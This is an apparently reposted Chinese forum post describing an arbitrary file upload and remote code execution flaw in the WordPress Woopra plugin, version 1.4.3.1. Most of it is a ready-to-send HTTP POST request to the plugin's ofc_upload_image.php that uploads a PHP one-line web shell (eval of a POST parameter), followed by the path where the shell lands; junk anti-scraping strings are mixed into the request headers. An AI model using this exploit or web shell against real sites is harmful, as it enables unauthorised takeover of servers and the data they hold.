WordPress Woopra插件任意文件上传+远程代码执行

admin

照例e文装逼

WordPress Woopra Remote Code Execution：http://www.wordpress-secure.org/ ... ote-code-execution/

此漏洞对Woopra 1.4.3.1以上版本无效。

插件下载地址：

http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip

/ c! ]% t5 F# z

exp发包：

POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
7 f" X# f9 I. R$ l! G2 ]Host: ha.cker.in
4 _0 x+ @$ F& J, K" TProxy-Connection: keep-alive
+ j( @: f2 A. `% bCache-Control: max-age=0
- W, m" H7 l$ e) z2 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% ]: r( i9 K# c! _$ D' p! XUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
. v$ \7 c) v: F6 M% h5 LAccept-Encoding: gzip,deflate,sdch
7 P' _7 V9 A4 {! zAccept-Language: zh-CN,zh;q=0.8
, d$ l9 a; z6 H6 q5 jContent-Length: 28

<?php eval($_POST['cmd']); ?>

4 Y) o: ]1 h) A* {

上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
0 H$ |* M6 C, f4 N